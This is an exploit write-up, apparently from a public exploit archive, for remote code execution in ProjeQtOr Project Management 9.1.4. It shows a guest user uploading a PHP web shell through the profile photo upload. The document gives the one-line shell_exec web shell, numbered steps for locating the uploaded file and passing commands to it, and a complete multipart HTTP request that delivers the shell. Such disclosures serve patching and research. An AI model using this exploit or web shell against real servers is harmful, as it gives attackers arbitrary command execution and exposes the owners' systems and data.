# Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution
# Date: 29.05.2021
# Exploit Author: Temel Demir
# Vendor Homepage: https://www.projeqtor.org
# Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV9.1.4.zip
# Version: v9.1.4
# Tested on: Laragon @WIN10
# Description : Remote code execution and authorization upgrade with guest user. A malicious file can be run with arbitrary file upload in the profile editing section.
PoC Process Step_by_Step:
# 1) Create a file with the below php code and save it as demir.pHp
<?php echo shell_exec($_GET['key'].' 2>&1'); ?>
# 2) Login to ProjeQtOr portal as guest user
# 3) Click -profile- button on header panel.
# 4) Click -add photo- button and chose upload section and browse your demir.pHp file.
# 5) Click OK. Script will give you "Attachment #($number) inserted". Attachment number need us for file path. (demo: attachment number is "23" > file directory "/files/attach//attachment_23/" )
# 6) As a last step you have to add the ".projeqtor" statement to the file extension.
You can call the uploaded file like this > http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor
# 7) Exploit: http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor?key=[command]
Example Request:
POST /project/tool/saveAttachment.php HTTP/1.1
Host: ip:port
Content-Length: 1196
Accept: application/json
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Origin: http://ip:port/website_location/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://ip:port/website_location/view/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=($your_phpsessid_c //edit); projeqtor=($your_projeqtor_c //edit)
Connection: close
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentFiles[]"; filename="demir.pHp"
Content-Type: application/octet-stream
<?php echo shell_exec($_GET['key'].' 2>&1'); ?>
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentId"
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentRefType"
User
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentRefId"
($your_profile_id //edit)
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentType"
file
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10485760
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentLink"
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentDescription"
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentPrivacy"
1
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="uploadType"
html5
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ--